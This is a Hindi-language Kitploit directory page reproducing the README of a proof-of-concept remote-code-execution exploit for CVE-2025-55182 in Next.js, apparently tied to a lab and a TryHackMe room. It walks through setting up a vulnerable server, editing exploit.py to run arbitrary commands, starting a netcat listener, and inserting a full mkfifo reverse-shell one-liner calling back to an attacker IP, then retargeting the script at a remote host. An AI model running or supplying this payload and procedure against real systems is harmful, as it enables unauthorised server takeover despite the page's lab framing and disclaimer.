Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
React2Shell-CVE-2025-55182 — CVE-2025-55182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Next.js में प्रोटोटाइप प्रदूषण के माध्यम से रिमोट कोड निष्पादन प्रदर्शित करता है। इसमें अधिकृत परीक्षण और रिवर्स शेल जनरेशन के लिए पूर्व-कॉन्फ़िगर किया गया कमजोर लैब शामिल है। | Kitploit
उपकरण/GitHubGitHub/rahul-securify/react2shell-cve-2025-55182
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणCTFलर्निंग और शिक्षालैब और अभ्यास
GitHubrahul-securify/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

CVE-2025-55182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Next.js में प्रोटोटाइप प्रदूषण के माध्यम से रिमोट कोड निष्पादन प्रदर्शित करता है। इसमें अधिकृत परीक्षण और रिवर्स शेल जनरेशन के लिए पूर्व-कॉन्फ़िगर किया गया कमजोर लैब शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
39 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

React2Shell CVE-2025-55182

यह एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है जो Next.js अनुप्रयोगों में रिएक्ट सर्वर कंपोनेंट्स रेंडरिंग पाइपलाइन में प्रोटोटाइप पोल्यूशन के माध्यम से रिमोट कोड निष्पादन भेद्यता को प्रदर्शित करता है।

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। उन प्रणालियों के खिलाफ अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की अनुमति आपके पास नहीं है, अवैध है।

📋 आवश्यक शर्तें

  • Node.js (v16 या नया)
  • Python 3.6+
  • netcat (रिवर्स शेल के लिए)
  • एक असुरक्षित Next.js अनुप्रयोग (इस रिपॉजिटरी में शामिल)

🚀 त्वरित आरंभ

विकल्प 1: पूर्व-कॉन्फ़िगर लैब का उपयोग करें

1. रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/securifyai/React2Shell-CVE-2025-55182.git
cd React2Shell-CVE-2025-55182

विकल्प 2: स्क्रैच से सर्वर बनाएं

root@kitploit:~
# Create a new Next.js app with the vulnerable version
npm create [email protected] react2shell-lab
# Accept all defaults when prompted
cd react2shell-lab

नोट: पूर्व-कॉन्फ़िगर लैब में पहले से ही आवश्यक असुरक्षित कोड शामिल है। यदि स्क्रैच से बना रहे हैं, तो आपको असुरक्षित कंपोनेंट्स को मैन्युअल रूप से जोड़ना होगा।

2. निर्भरताएँ इंस्टॉल करें

root@kitploit:~
cd react2shell-lab
npm install

3. असुरक्षित सर्वर प्रारंभ करें

टर्मिनल 1 में:

root@kitploit:~
npm run dev

सर्वर http://localhost:3000 पर प्रारंभ होना चाहिए।

🔧 शोषण

बुनियादी कमांड निष्पादन

  1. रिपॉजिटरी में एक exploit.py फ़ाइल शामिल है जो भेद्यता को प्रदर्शित करती है। फ़ाइल में COMMAND वेरिएबल को अपने इच्छित कमांड से संपादित करें:

    root@kitploit:~
    COMMAND = 'whoami'  # Change this to any command you want to execute
    
  2. एक्सप्लॉइट चलाएँ:

    root@kitploit:~
    python3 exploit.py
    

रिवर्स शेल

  1. एक नए टर्मिनल में netcat लिसनर सेट करें:

    root@kitploit:~
    nc -nvlp 4444
    
  2. exploit.py को संपादित करें और कमांड को अपने रिवर्स शेल पेलोड में अपडेट करें:

    root@kitploit:~
    COMMAND = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f'
    

    YOUR_IP को अपने स्थानीय मशीन के IP पते से बदलें।

  3. एक्सप्लॉइट चलाएँ:

    root@kitploit:~
    python3 exploit.py
    

🛠️ उन्नत उपयोग

रिमोट टारगेट का परीक्षण

रिमोट सर्वर को टारगेट करने के लिए एक्सप्लॉइट स्क्रिप्ट में HOST वेरिएबल को संपादित करें:

root@kitploit:~
HOST = 'target-ip-address'  # Replace with target IP
PORT = 3000  # Default Next.js port

सामान्य कमांड

  • डायरेक्टरी सामग्री सूचीबद्ध करें: ls -la
  • सिस्टम जानकारी प्राप्त करें: uname -a
  • वर्तमान उपयोगकर्ता प्राप्त करें: whoami
  • नेटवर्क जानकारी प्राप्त करें: ifconfig या ip a

🔍 समस्या निवारण

  • कनेक्शन अस्वीकृत: सुनिश्चित करें कि टारगेट सर्वर चालू है और एक्सेस योग्य है।
  • कमांड नहीं मिला: टारगेट सिस्टम में कुछ बाइनरी इंस्टॉल नहीं हो सकती हैं।
  • कोई आउटपुट नहीं: कमांड निष्पादित तो हो सकती है लेकिन कोई आउटपुट उत्पन्न नहीं हुआ।

📚 संदर्भ

  • CVE-2025-55182
  • Next.js सुरक्षा सलाह
  • JavaScript में प्रोटोटाइप पोल्यूशन

📄 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

यह संस्करण रिमोट टारगेट और हमलावर के IP तथा पोर्ट के लिए उपयोगकर्ता इनपुट मांगता है। इस संस्करण में पोस्ट बॉडी (body_parts) को भी थोड़ा छोटा किया गया है।

स्रोत:

https://www.averlon.ai/blog/react2shell-cve-2025-55182-explained

https://tryhackme.com/room/react2shellcve202555182

टूल डाउनलोड करें